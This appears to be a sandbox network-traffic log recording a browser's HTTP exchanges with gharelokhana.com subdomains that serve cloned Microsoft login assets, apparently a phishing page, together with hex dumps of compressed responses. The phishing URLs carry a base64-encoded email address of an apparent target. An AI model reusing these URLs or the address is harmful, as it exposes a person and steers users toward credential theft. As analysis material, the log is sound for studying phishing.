2024-12-04 16:37:36 UTC	8	IN	Data Raw: 4b 46 5b 47 55 28 0d 0a Data Ascii: KF[GU(

Timestamp	Bytes transferred	Direction	Data
2024-12-04 16:37:38 UTC	1176	OUT	POST /?km=anVlcmdlbi5zY2h3YXJ6QGNhcGVsbGFzcGFjZS5jb20=%C3%83%C2%A3%C3%A2%C2%82%C2%AC%C3%A2%C2%80%C2%9A$$$%C3%83%C2%A3%C3%A2%C2%82%C2%AC%C3%A2%C2%80%C2%9A HTTP/1.1 Host: fdgfhvcfdgfhhjh.gharelokhana.com Connection: keep-alive Content-Length: 5335 Cache-Control: max-age=0 sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117" sec-ch-ua-mobile: ?0 sec-ch-ua-platform: "Windows" Upgrade-Insecure-Requests: 1 Origin: https://fdgfhvcfdgfhhjh.gharelokhana.com Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Sec-Fetch-Site: same-origin Sec-Fetch-Mode: navigate Sec-Fetch-User: ?1 Sec-Fetch-Dest: document Referer: https://fdgfhvcfdgfhhjh.gharelokhana.com/?km=anVlcmdlbi5zY2h3YXJ6QGNhcGVsbGFzcGFjZS5jb20=%C3%83%C2%A3%C3%A2%C2%82%C2%AC%C3%A2%C2%80%C2%9A$$$%C3%83%C2%A3%C3%A2%C2%82%C2%AC%C3%A2%C2%80%C2%9A Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9
2024-12-04 16:37:38 UTC	5335	OUT	Data Raw: 38 73 39 72 73 7a 73 74 6b 65 68 3d 25 35 42 25 35 42 25 32 32 37 61 36 64 37 32 32 35 34 33 33 32 32 25 32 32 25 32 43 25 32 32 35 33 38 33 32 36 35 32 35 33 37 34 34 25 32 32 25 32 43 25 32 32 37 30 32 35 33 37 34 33 32 35 33 37 34 25 32 32 25 32 43 25 32 32 36 32 35 33 37 34 34 37 39 32 35 33 33 25 32 32 25 32 43 25 32 32 34 32 37 32 36 65 37 36 36 62 32 35 33 25 32 32 25 32 43 25 32 32 33 34 32 32 35 33 33 34 33 33 34 32 35 25 32 32 25 32 43 25 32 32 33 37 34 32 33 35 33 38 33 38 33 30 33 25 32 32 25 32 43 25 32 32 34 33 37 33 36 33 30 33 38 33 33 33 36 25 32 32 25 32 43 25 32 32 33 35 33 37 33 32 33 39 33 31 33 32 25 32 32 25 35 44 25 32 43 25 32 32 35 38 38 30 34 37 36 30 38 33 25 32 32 25 32 43 25 32 32 37 33 37 36 35 38 39 25 32 32 25 32 43 36 25 Data Ascii: 8s9rszstkeh=%5B%5B%227a6d722543322%22%2C%225383265253744%22%2C%227025374325374%22%2C%226253744792533%22%2C%2242726e766b253%22%2C%223422533433425%22%2C%223742353838303%22%2C%224373630383336%22%2C%22353732393132%22%5D%2C%225880476083%22%2C%227376589%22%2C6%
2024-12-04 16:37:38 UTC	550	IN	HTTP/1.1 302 Found Server: nginx Date: Wed, 04 Dec 2024 16:37:38 GMT Content-Type: text/html; charset=utf-8 Transfer-Encoding: chunked Connection: close location: https://fdgfhvcfdgfhhjh.gharelokhana.com/?km=anVlcmdlbi5zY2h3YXJ6QGNhcGVsbGFzcGFjZS5jb20=%C3%83%C2%A3%C3%A2%C2%82%C2%AC%C3%A2%C2%80%C2%9A$$$%C3%83%C2%A3%C3%A2%C2%82%C2%AC%C3%A2%C2%80%C2%9A set-cookie: zQt4SK="NTNjYWU2NzctOTE3My00ZWNmLWEzYTMtYWY5ZTRiYjk3MmE5OmFkNmQ3ZGY4LWUzYzQtNDRhZS1hNDVhLWFkMzBkMDQ3NTIzNg=="; Domain=gharelokhana.com; HttpOnly; Path=/; SameSite=None; Secure
2024-12-04 16:37:38 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Timestamp	Bytes transferred	Direction	Data
2024-12-04 16:37:39 UTC	1295	OUT	POST /?km=anVlcmdlbi5zY2h3YXJ6QGNhcGVsbGFzcGFjZS5jb20=%C3%83%C2%A3%C3%A2%C2%82%C2%AC%C3%A2%C2%80%C2%9A$$$%C3%83%C2%A3%C3%A2%C2%82%C2%AC%C3%A2%C2%80%C2%9A HTTP/1.1 Host: fdgfhvcfdgfhhjh.gharelokhana.com Connection: keep-alive Content-Length: 5335 Cache-Control: max-age=0 sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117" sec-ch-ua-mobile: ?0 sec-ch-ua-platform: "Windows" Upgrade-Insecure-Requests: 1 Origin: https://fdgfhvcfdgfhhjh.gharelokhana.com Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Sec-Fetch-Site: same-origin Sec-Fetch-Mode: navigate Sec-Fetch-User: ?1 Sec-Fetch-Dest: document Referer: https://fdgfhvcfdgfhhjh.gharelokhana.com/?km=anVlcmdlbi5zY2h3YXJ6QGNhcGVsbGFzcGFjZS5jb20=%C3%83%C2%A3%C3%A2%C2%82%C2%AC%C3%A2%C2%80%C2%9A$$$%C3%83%C2%A3%C3%A2%C2%82%C2%AC%C3%A2%C2%80%C2%9A Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9 Cookie: zQt4SK="NTNjYWU2NzctOTE3My00ZWNmLWEzYTMtYWY5ZTRiYjk3MmE5OmFkNmQ3ZGY4LWUzYzQtNDRhZS1hNDVhLWFkMzBkMDQ3NTIzNg=="
2024-12-04 16:37:39 UTC	5335	OUT	Data Raw: 38 73 39 72 73 7a 73 74 6b 65 68 3d 25 35 42 25 35 42 25 32 32 37 61 36 64 37 32 32 35 34 33 33 32 32 25 32 32 25 32 43 25 32 32 35 33 38 33 32 36 35 32 35 33 37 34 34 25 32 32 25 32 43 25 32 32 37 30 32 35 33 37 34 33 32 35 33 37 34 25 32 32 25 32 43 25 32 32 36 32 35 33 37 34 34 37 39 32 35 33 33 25 32 32 25 32 43 25 32 32 34 32 37 32 36 65 37 36 36 62 32 35 33 25 32 32 25 32 43 25 32 32 33 34 32 32 35 33 33 34 33 33 34 32 35 25 32 32 25 32 43 25 32 32 33 37 34 32 33 35 33 38 33 38 33 30 33 25 32 32 25 32 43 25 32 32 34 33 37 33 36 33 30 33 38 33 33 33 36 25 32 32 25 32 43 25 32 32 33 35 33 37 33 32 33 39 33 31 33 32 25 32 32 25 35 44 25 32 43 25 32 32 35 38 38 30 34 37 36 30 38 33 25 32 32 25 32 43 25 32 32 37 33 37 36 35 38 39 25 32 32 25 32 43 36 25 Data Ascii: 8s9rszstkeh=%5B%5B%227a6d722543322%22%2C%225383265253744%22%2C%227025374325374%22%2C%226253744792533%22%2C%2242726e766b253%22%2C%223422533433425%22%2C%223742353838303%22%2C%224373630383336%22%2C%22353732393132%22%5D%2C%225880476083%22%2C%227376589%22%2C6%
2024-12-04 16:37:41 UTC	781	IN	HTTP/1.1 200 OK Server: nginx Date: Wed, 04 Dec 2024 16:37:40 GMT Content-Type: text/html; charset=utf-8 Content-Length: 55207 Connection: close cache-control: no-store, no-cache pragma: no-cache vary: Accept-Encoding p3p: CP="DSP CUR OTPi IND OTRi ONL FIN" x-ms-request-id: aa87e5f3-2698-4fc4-bb9c-b49b7b8e8d01 x-ms-ests-server: 2.1.19492.3 - SEC ProdSlices report-to: {"group":"network-errors","max_age":86400,"endpoints":[{"url":"https://bfbeb8fd-53cae677.gharelokhana.com/api/report?catId=GW+estsfd+frc"}]} nel: {"report_to":"network-errors","max_age":86400,"success_fraction":0.001,"failure_fraction":1.0} x-ms-srs: 1.P referrer-policy: strict-origin-when-cross-origin content-encoding: gzip access-control-allow-origin: * access-control-allow-headers: *
2024-12-04 16:37:41 UTC	15603	IN	Data Raw: 1f 8b 08 00 00 00 00 00 00 03 d4 bd fb 5b e2 c8 b6 30 fc fb fc 15 ca 99 47 c8 16 91 3b 08 9d f1 a8 a8 6d 7b 01 31 6a 37 0c c7 37 24 41 a3 40 30 01 c5 ee f6 fd db bf 75 a9 4a 2a 08 3d b3 cf 99 f3 3e cf 37 7b b7 24 95 4a d5 aa 55 ab d6 bd 2a 9f d6 1b cd 03 e3 5b eb 70 ed 61 3a 1a fe f1 db 27 fc 59 b3 86 66 10 e8 89 c4 9a ed fa 7a 62 38 f5 13 6b 43 73 7c af 27 9c 71 e2 8f df d6 3e 3d 38 a6 0d bf 6b 9f a6 ee 74 e8 e0 d5 da 95 7b 3f 5e 73 c7 6b 53 6f ed cd 9b f9 6b a6 65 79 b3 f1 14 2b 6d 87 b5 3e 8d 9c a9 b9 66 79 e3 a9 33 9e ea 89 a9 33 9f 6e 63 87 f5 35 eb c1 f4 03 67 aa cf a6 83 ad 6a 02 80 99 4e b6 9c e7 99 fb a2 27 0e b8 fa 96 f1 36 71 12 db 4b 9a 39 39 d4 1d fb de 89 bf f5 75 eb 7a 6f eb c0 1b 4d cc a9 db 1f 2e 7f f1 d5 b5 a7 0f ba ed bc b8 96 b3 45 37 Data Ascii: [0G;m{1j77$A@0uJ=>7{$JU[pa:'Yfzb8kCs\|'q>=8kt{?^skSokey+m>fy33nc5gjN'6qK99uzoM.E7
2024-12-04 16:37:41 UTC	16379	IN	Data Raw: 66 5b 9c eb da 88 f2 94 eb 90 de 80 f0 92 8b c2 11 40 20 e5 d4 dc 4b 7a 6b 1d e3 1f 00 c9 53 cd c8 6e a6 00 1a 60 0d b5 e4 7f 24 b5 4d 1c a4 04 db 19 40 df f2 64 32 b6 57 ce a9 7b f9 45 1f 3f fa b8 cf b9 86 3b 40 dd f1 cc a9 a3 3b cd 47 8b bf fe 9e 0a 61 03 d5 15 07 7b 0e 00 9d 77 39 37 bf 27 8c 1b 3f 1d 56 61 af 5c 1a 4d 19 c6 b7 8f 56 4f e8 38 00 f5 ef 6f da dd 62 ea be 45 b2 ff 1b 61 b3 4c aa 2e 5e e7 06 65 4e 11 08 bd d5 37 a9 c8 07 18 5a ed 51 9c 76 2d e6 85 26 80 ec dc 6a 39 77 24 ba 66 a2 dd b1 85 3d 28 88 ba 92 55 c2 d8 82 64 25 39 e7 4d c5 cd 43 2a 6f 14 b9 8c 88 59 50 3d 4a 89 54 78 be 06 85 2c 79 eb 6f d7 3e 92 f4 43 44 7e b4 84 c8 f7 43 b2 16 40 7f d7 ed 23 8c 64 a2 27 6c 5f c3 38 e6 3a cc c5 a2 7a fd 16 29 ba c1 e7 af fd 73 52 74 df 68 0a 4b Data Ascii: f[@ KzkSn`$M@d2W{E?;@;Ga{w97'?Va\MVO8obEaL.^eN7ZQv-&j9w$f=(Ud%9MC*oYP=JTx,yo>CD~C@#d'l_8:z)sRthK
2024-12-04 16:37:41 UTC	16384	IN	Data Raw: 58 e2 7b dc 7b e1 f7 7f 50 fd ec 84 ef 36 7d f0 a3 12 ef 7f 88 2c ee 26 8c db 0f 3f fc be 19 4e 8d c1 d5 f6 c2 e2 03 99 5f 24 82 c6 73 63 a3 c8 25 f6 c6 7e 2f 86 9b 3e 41 3e d5 ce c8 fa bd b1 3c 2d 0b c2 dc ca ef 01 5f 0f 2b 4c 41 72 f5 7b 2b 39 46 00 1e 2a 88 e9 4e 45 88 64 21 20 78 ee e0 95 71 85 8a 24 3a 2e 48 30 55 b0 1b 23 3a 0c c4 bf 6c 81 9e 04 ef 44 82 26 98 f5 ca 6a 9f 04 db ca a2 ad 37 54 41 59 83 66 3f 5b e2 84 98 b1 01 cf 95 3d f5 79 bf 37 74 d8 86 8c 6c 65 6e f9 1b ff 97 32 ad 6a ff 12 bb 57 de 2d 6f c1 4b 45 71 b2 5b c3 02 cb 03 33 b9 5b a3 44 2f 80 4b 1f 33 a5 f3 10 6c f7 2b df c5 5e 29 8c b0 c4 05 5f fa 41 95 64 fe 7c 0e 72 c1 50 dc f4 b2 df 03 e7 0b 34 0b 75 5c fa d1 48 e0 ee 88 1f 63 b8 66 d7 78 f6 32 0f 4a 78 30 58 e6 27 15 c7 71 9e 6f Data Ascii: X{{P6},&?N_$sc%~/>A><-_+LAr{+9F*NEd! xq$:.H0U#:lD&j7TAYf?[=y7tlen2jW-oKEq[3[D/K3l+^)_Ad\|rP4u\Hcfx2Jx0X'qo
2024-12-04 16:37:41 UTC	6841	IN	Data Raw: a9 19 ec ab 0e 5e 3f fc 2c cd a5 99 a8 a0 bc c2 57 a3 68 2f 80 c4 25 d9 45 e5 0c 5d 57 fd c8 04 cb f3 a3 cf 7b 8f ae ac ec 34 bc b6 b2 92 cc ab ab ec 8a af ae 04 2f d5 57 44 58 08 13 9f 1d 79 77 85 6e 9c 76 99 90 83 1f 07 f2 86 99 b7 a5 98 ce 3f e7 d5 77 58 fa 69 a3 c0 0c 4c 25 33 b2 ec c5 6f 03 3c b4 e9 89 37 de 12 b6 aa 42 52 3e a7 c0 34 74 ff 16 03 58 39 90 47 18 48 4c 1f 4e 99 3d c3 a0 35 75 44 25 31 3f 00 0a 62 fc 8e 40 d3 ed fe 47 10 95 bf c4 9c 6e c2 bc 0e a6 09 72 01 32 07 84 eb c4 52 eb e0 5f 20 cb 41 48 35 7c 4c 9a 2e 27 d2 56 01 eb 02 fc 70 68 50 b1 53 b1 25 c8 66 c8 33 08 09 97 10 b7 50 35 03 2a ae 68 31 8d d1 29 1c 77 ea 21 05 39 c7 bd d6 48 77 c5 1e dc 69 36 aa b2 3a a2 56 41 7e 3c e1 36 5a bb 64 1d aa 9b 11 f0 d3 1e 8a 2d 8c 9f 36 48 1f ef Data Ascii: ^?,Wh/%E]W{4/WDXywnv?wXiL%3o<7BR>4tX9GHLN=5uD%1?b@Gnr2R_ AH5\|L.'VphPS%f3P5*h1)w!9Hwi6:VA~<6Zd-6H

Timestamp	Bytes transferred	Direction	Data
2024-12-04 16:37:42 UTC	688	OUT	GET /ests/2.1/content/cdnbundles/converged.v2.login.min_nin8k2ycrbzww8zl5vxkaq2.css HTTP/1.1 Host: 4cd0d823-53cae677.gharelokhana.com Connection: keep-alive sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117" Origin: https://fdgfhvcfdgfhhjh.gharelokhana.com sec-ch-ua-mobile: ?0 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 sec-ch-ua-platform: "Windows" Accept: text/css,/;q=0.1 Sec-Fetch-Site: same-site Sec-Fetch-Mode: cors Sec-Fetch-Dest: style Referer: https://fdgfhvcfdgfhhjh.gharelokhana.com/ Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9
2024-12-04 16:37:43 UTC	796	IN	HTTP/1.1 200 OK Server: nginx Date: Wed, 04 Dec 2024 16:37:43 GMT Content-Type: text/css Content-Length: 20400 Connection: close cache-control: public, max-age=31536000 last-modified: Wed, 25 Sep 2024 21:42:27 GMT etag: 0x8DCDDAAF34D1A25 x-ms-request-id: f5159d06-401e-007a-4ad0-44de16000000 x-ms-version: 2009-09-19 x-ms-lease-status: unlocked x-ms-blob-type: BlockBlob access-control-expose-headers: x-ms-request-id,Server,x-ms-version,Content-Type,Content-Encoding,Cache-Control,Last-Modified,ETag,x-ms-lease-status,x-ms-blob-type,Content-Length,Date,Transfer-Encoding access-control-allow-origin: * x-azure-ref: 20241204T163743Z-15b54885d96kqd6bhC1FRAcz8g00000005k0000000007w72 x-fd-int-roxy-purgeid: 4554691 x-cache: TCP_HIT accept-ranges: bytes content-encoding: gzip
2024-12-04 16:37:43 UTC	15588	IN	Data Raw: 1f 8b 08 00 00 00 00 00 00 03 ed 7d 6b 93 db 36 b2 e8 77 ff 0a ee a4 52 eb c9 4a 8c 48 3d 47 53 49 ad e3 78 93 39 c7 af b2 9d 7d 54 2a b5 c5 91 a8 11 8f 29 51 97 a4 66 3c ab a3 ff 7e f1 46 03 68 90 d4 78 b2 d9 7b 2b eb 8d 2d a2 1b 0d a0 d1 68 a0 81 6e e0 eb af fe 10 3c 2f 76 f7 65 76 b3 ae 83 a7 cf cf 83 57 d9 a2 2c aa 62 55 93 f4 72 57 94 49 9d 15 db 30 78 96 e7 01 43 aa 82 32 ad d2 f2 36 5d 86 c1 57 5f 7f fd d5 1f 9e f4 bb ff 2f 78 ff e1 d9 bb 0f c1 9b bf 04 1f 7e bc 7a f7 7d f0 96 7c fd 23 78 fd e6 c3 d5 f3 17 41 67 2a 4f 9e 7c 58 67 55 b0 ca f2 34 20 ff 5e 27 55 ba 0c 8a 6d 50 94 41 b6 5d 88 5a a7 55 b0 21 7f 97 59 92 07 ab b2 d8 04 f5 3a 0d 76 65 f1 3f e9 82 b4 21 cf aa 9a 64 ba 4e f3 e2 2e 78 4a c8 95 cb e0 6d 52 d6 f7 c1 d5 db f3 30 f8 40 70 0b d2 Data Ascii: }k6wRJH=GSIx9}T)Qf<~Fhx{+-hn</vevW,bUrWI0xC26]W_/x~z}\|#xAgO\|XgU4 ^'UmPA]ZU!Y:ve?!dN.xJmR0@p
2024-12-04 16:37:44 UTC	4812	IN	Data Raw: 75 4c ff b4 b4 67 78 ce 2b 2b 6e 13 d6 17 0b 8b ca ba c2 a2 2a 8b 88 bd ac 2c 12 31 2f 2a 2b 24 e5 a1 95 75 9e df 51 bb 5f 6a 19 63 dc bc c9 45 89 b5 70 47 5d 70 ca fb 9e 0e 20 56 49 be 20 69 14 01 46 49 a3 08 a2 a9 10 de 51 33 ab ab 42 ad 3a 03 51 82 c9 86 58 21 80 b6 66 35 88 5b 0b 1a d2 44 af 18 0e 06 e3 65 32 71 db a4 25 ce 20 03 a5 0f 01 b4 b6 c9 2f 95 2d 68 58 9b 7c d2 ca db f4 30 61 ec 73 a7 f6 1e b8 a8 5b 0e 36 f1 85 8e 36 04 a6 86 1b 02 93 e3 0d 14 66 70 df 93 6e 56 08 83 b4 76 40 43 45 db f0 b0 2e 10 57 99 1b 46 0a 7a 9a 6c 5e eb 5b 91 85 43 fa 34 bc 98 9d 23 97 02 03 20 96 48 ba 89 37 5f 87 50 e3 87 e3 60 22 80 5b d9 23 19 93 28 7f 18 bb 0c ee 13 f6 9e b3 cc 4f 7d b0 93 e5 be fa 81 1c e1 db 81 87 f8 c3 85 9e 97 26 d9 ad e4 e2 f9 d0 f9 26 d9 66 Data Ascii: uLgx++n,1/+$uQ_jcEpG]p VI iFIQ3B:QX!f5[De2q% /-hX\|0as[66fpnVv@CE.WFzl^[C4# H7_P`"[#(O}&&f

Timestamp	Bytes transferred	Direction	Data
2024-12-04 16:37:42 UTC	664	OUT	GET /shared/1.0/content/js/ConvergedError_Core_M3x8o7EaVDaB8GOhHsrPIA2.js HTTP/1.1 Host: 4cd0d823-53cae677.gharelokhana.com Connection: keep-alive sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117" Origin: https://fdgfhvcfdgfhhjh.gharelokhana.com sec-ch-ua-mobile: ?0 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 sec-ch-ua-platform: "Windows" Accept: / Sec-Fetch-Site: same-site Sec-Fetch-Mode: cors Sec-Fetch-Dest: script Referer: https://fdgfhvcfdgfhhjh.gharelokhana.com/ Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9
2024-12-04 16:37:44 UTC	806	IN	HTTP/1.1 200 OK Server: nginx Date: Wed, 04 Dec 2024 16:37:44 GMT Content-Type: application/x-javascript Content-Length: 98503 Connection: close cache-control: public, max-age=31536000 last-modified: Wed, 02 Oct 2024 20:05:25 GMT etag: 0x8DCE31D8E339582 x-ms-request-id: 7b7689a4-a01e-002f-1fd1-44ce9d000000 x-ms-version: 2009-09-19 x-ms-lease-status: unlocked x-ms-blob-type: BlockBlob access-control-expose-headers: x-ms-request-id,Server,x-ms-version,Content-Type,Content-Encoding,Cache-Control,Last-Modified,ETag,x-ms-lease-status,x-ms-blob-type,Content-Length,Date,Transfer-Encoding access-control-allow-origin: * x-azure-ref: 20241204T163743Z-16c5c9558c6v9vnqhC1DUSu0dg00000004v00000000000kd x-fd-int-roxy-purgeid: 0 x-cache: TCP_HIT accept-ranges: bytes content-encoding: gzip
2024-12-04 16:37:44 UTC	15578	IN	Data Raw: 1f 8b 08 00 00 00 00 00 00 03 e4 bd 7b 77 e3 36 b2 38 f8 ff 7e 0a 99 33 eb 90 31 ad d6 d3 0f 3a 8c af 2c ab bb 35 b1 2d 8f 65 27 99 eb f6 f8 50 24 24 33 96 49 5d 92 f2 63 24 fd 3e fb 56 15 00 12 a4 28 77 77 66 ce 9e bb 67 f3 b0 08 a0 f0 2a 14 0a 55 40 a1 f0 e1 c7 ad ff ab f2 63 65 f7 db ff a9 0c af 3b 57 d7 95 c1 c7 ca f5 e7 fe d5 69 e5 12 42 ff a8 5c 0c ae fb dd de b7 97 83 95 e2 ff d7 0f 7e 5c 19 fb 53 56 81 df 91 13 33 af 12 06 95 30 aa f8 81 1b 46 b3 30 72 12 16 57 9e e0 6f e4 3b d3 ca 38 0a 9f 2a c9 03 ab cc a2 f0 0f e6 26 71 65 ea c7 09 64 1a b1 69 f8 52 d1 a1 b8 c8 ab 5c 3a 51 f2 56 e9 5f 1a 55 28 9f 41 69 fe c4 0f 20 b7 1b ce de e0 fb 21 a9 04 61 e2 bb ac e2 04 1e 95 36 85 40 10 b3 ca 3c f0 58 54 79 79 f0 dd 87 ca b9 ef 46 61 1c 8e 93 4a c4 5c e6 Data Ascii: {w68~31:,5-e'P$$3I]c$>V(wwfgU@ce;WiB\~\SV30F0rWo;8&qediR\:QV_U(Ai !a6@<XTyyFaJ\
2024-12-04 16:37:44 UTC	14460	IN	Data Raw: 34 e8 a1 01 7a 6a 85 32 e1 56 15 fe 05 d5 1d 37 8e ab ea 38 e2 eb 3f b9 08 9b 07 f1 53 51 49 c8 e9 3f 08 34 25 24 a8 4e e8 c5 3c 66 6b 07 61 d6 56 7d 25 9e 9c d2 c3 ea 28 a5 1a 50 f7 41 54 c9 a8 08 d6 7a 80 c0 98 1c 29 2d 97 ac aa d2 92 61 a0 f0 85 ef 25 af 81 9a a1 f2 48 27 49 90 bc 0e 35 3b c0 cc 4b 29 0e e0 ca 49 91 e7 a0 e2 ce 41 fb b6 b7 9e 97 cb ad 07 7a cc a3 82 ca 0b ee d3 17 eb 25 1d e9 67 bb b6 5c aa 49 d8 cb f2 14 d1 d3 00 94 43 9f 05 de f4 4d 9c 33 1b c6 c6 a2 05 36 d7 ba eb e9 e3 f4 6d 89 ea 87 45 6d 55 fd 63 36 41 37 58 65 e5 00 3d cc 49 5a 7b 9b 66 cf 76 eb 5a 06 8a 22 9c c6 df 46 8b 9f 9c e9 74 73 35 bb 94 fe 7e 65 44 7e e5 f8 28 74 47 12 c8 74 ad 37 b3 a0 50 41 5a 0a 16 2f 69 63 0d b9 90 52 c0 ad bd 86 6d 75 4c 83 ea 3c 9a f2 e3 df 93 5c Data Ascii: 4zj2V78?SQI?4%$N<fkaV}%(PATz)-a%H'I5;K)IAz%g\ICM36mEmUc6A7Xe=IZ{fvZ"Fts5~eD~(tGt7PAZ/icRmuL<\
2024-12-04 16:37:44 UTC	12576	IN	Data Raw: 91 8b 28 94 c5 5c 44 be 6d 08 55 77 9b 1b b2 b3 b9 8a 1f 19 b8 1a ef aa fd de 94 72 5a 95 74 c9 01 ee 3d e7 9c 39 91 62 11 7f b8 ab 08 4e 79 b9 36 c1 96 8e d1 e1 df f9 a2 34 61 c7 bb d7 4b 40 4a cc f7 7d 64 0e 74 16 fe 59 78 53 23 e8 71 b2 0c e7 07 be 73 58 83 2b 79 4c cf 0e 1f a9 cb 85 5f 43 6e 98 2c fd 1a 31 06 f8 5b 4e e6 9f 9b b2 87 fc 58 bd c2 97 f6 ab c9 e4 22 9c 7f d1 2d 7c 58 97 ea 85 f2 f1 d0 5b 67 93 0b 5f b4 e9 93 4b 69 97 18 51 69 e7 ac ea 6c bd 4a c3 07 fa ea 81 54 24 cf f1 32 bd 87 90 9b f5 e4 72 eb 7f 08 bf 7a cc 93 f9 2b 77 7f 13 0d 1d 6c 38 7e 57 bc 85 57 c2 6c 42 ff ed 01 8f d9 fc e2 d2 ec 50 a8 75 d9 2e 9e f3 82 c0 7a 82 37 2f ed 8a f9 fe a2 6b b8 9f 16 ad 55 7e 00 13 a7 7d cb ec aa 29 5c 47 6d 33 64 fb c5 62 d7 f6 00 c3 c2 3a 74 6a 11 Data Ascii: (\DmUwrZt=9bNy64aK@J}dtYxS#qsX+yL_Cn,1[NX"-\|X[g_KiQilJT$2rz+wl8~WWlBPu.z7/kU~})\Gm3db:tj
2024-12-04 16:37:45 UTC	16384	IN	Data Raw: 49 a8 d0 07 89 bc 7b 5d c1 98 4e bc 3d 37 d1 f0 00 f8 2b 49 0d 00 1c c0 3e b5 9b 30 21 69 13 60 42 15 03 ac e6 2c ce 62 0d 6d f2 ec 3f 9b 14 1b 8a 5d f8 dc 76 aa 61 2b a1 0f 1f 8d 85 cd 8b f3 fc 3d 45 36 57 b8 1e 9e 3b 7e 31 7c 7e da 14 82 58 0e ac b0 64 e6 9a 45 17 1a ac 04 f0 5e d4 d4 02 23 a7 1f 22 7f 03 4f f7 de 5e 3d c9 38 54 be 6e 3b a1 d1 a2 2d 85 dc 21 2a dc bc c8 b0 7d 66 8f f0 d4 ed a0 62 1a 05 c7 92 05 78 7f cd 15 89 5c 7c 94 fa 3d 5f ba cd cb 92 80 e1 05 cc b6 1a c7 28 ae 2a 6e 00 96 79 ef 26 d3 79 f5 42 2d 0b 56 5a 5e 55 9f 48 76 a7 ca 10 51 0f a8 f6 ea d9 47 e9 71 f3 f9 5c 59 5d ec ce 2b 6f 4e 75 0c 71 cb 24 b1 fb a7 36 ae 06 dd 26 c6 8e 93 c1 0f 50 4a 47 3f 73 88 e2 02 e8 41 ff 66 28 58 fd 23 6c 06 46 dd da f1 fd a6 81 4d cb 07 96 b4 35 d9 Data Ascii: I{]N=7+I>0!i`B,bm?]va+=E6W;~1\|~XdE^#"O^=8Tn;-!}fbx\\|=_(ny&yB-VZ^UHvQGq\Y]+oNuq$6&PJG?sAf(X#lFM5
2024-12-04 16:37:45 UTC	6538	IN	Data Raw: 0b 47 fc c0 97 80 31 f5 62 3b c9 b5 66 04 e2 15 4f a3 c1 22 54 0c 08 5d 15 0c 37 0d 0a ad 50 f3 13 bd 18 35 32 cd 8d 53 54 7b e9 2c d5 05 98 00 84 25 c0 d4 a5 d7 30 2c 27 95 e8 87 1c 2a cd c8 80 81 c4 13 96 31 62 70 8f 40 a6 c0 28 d0 d8 a5 06 c8 25 eb e7 be 9d 64 39 d8 eb 05 49 18 fc e8 04 c8 3a 05 12 b0 54 68 49 61 ee 80 e7 f6 83 ba b5 66 94 18 c0 95 47 27 5e 9f 19 e0 ea 85 23 3a 65 3e 49 24 ba cd f7 d4 59 0e ac 4d 41 db 9c 49 40 1b b4 6d a1 f5 d4 17 16 0c 5f 0b 74 d9 0f 77 dd 9c a6 29 93 01 27 d7 ce eb c2 6b e7 8c 10 05 a8 e7 1c b4 3f a6 b2 5e a4 93 14 b9 4e d0 bb db 17 86 71 69 38 f1 16 4f 9f 38 b0 0c 9b 99 24 31 bd 68 e5 95 12 41 a9 05 79 c1 24 07 8b dd f1 02 0c 4f a2 5c e2 39 05 25 02 0c b6 5e 58 39 e8 10 24 01 cb a5 10 52 7b 06 0a 33 18 6a a9 80 3e Data Ascii: G1b;fO"T]7P52ST{,%0,'*1bp@(%d9I:ThIafG'^#:e>I$YMAI@m_tw)'k?^Nqi8O8$1hAy$O\9%^X9$R{3j>
2024-12-04 16:37:45 UTC	16384	IN	Data Raw: 3f f1 e3 7f e6 18 97 93 68 5f 48 e9 b2 cc 00 df a0 06 33 1f 38 d0 3d ac 25 bd 6b d4 65 af 21 b6 b8 66 14 ec 06 60 95 09 50 57 91 81 bc 90 49 5a 18 93 70 ff 65 c6 1a f1 9c 25 1a c3 56 66 ba 20 05 74 88 1a bd 48 30 b4 a1 42 41 dd bb 7d d8 e8 1b 54 e8 94 a6 19 66 b4 2b 00 06 6a 93 02 54 bc 44 49 cb 61 1e 68 ff 14 5e ed 6a 16 60 27 61 86 5f 97 01 ef 96 a8 c2 a7 8e 39 57 20 57 03 49 79 ef 50 97 37 76 4c 32 50 28 13 ca 3d f4 67 c0 4c c5 a8 da 86 17 c0 3d 15 d7 a2 77 4b e2 aa b9 8f 9b c3 d8 30 29 82 97 60 ba 81 fd cf 0b 01 22 99 7b 6b 2c 58 c9 f4 0b 8e bb 94 cd 20 a5 52 a3 41 e1 25 60 5d 68 a3 ac c6 d4 e5 60 42 82 42 46 14 ed 79 f4 b3 b8 6d 4c 60 15 65 9e 68 c7 94 a2 a0 88 24 94 49 10 1a 5a 68 c1 3c 2c f4 9e 07 5d f6 4a bd 92 29 4c 74 92 51 e0 dc 99 61 14 73 3f Data Ascii: ?h_H38=%ke!f`PWIZpe%Vf tH0BA}Tf+jTDIah^j`'a_9W WIyP7vL2P(=gL=wK0)`"{k,X RA%`]h`BBFymL`eh$IZh<,]J)LtQas?
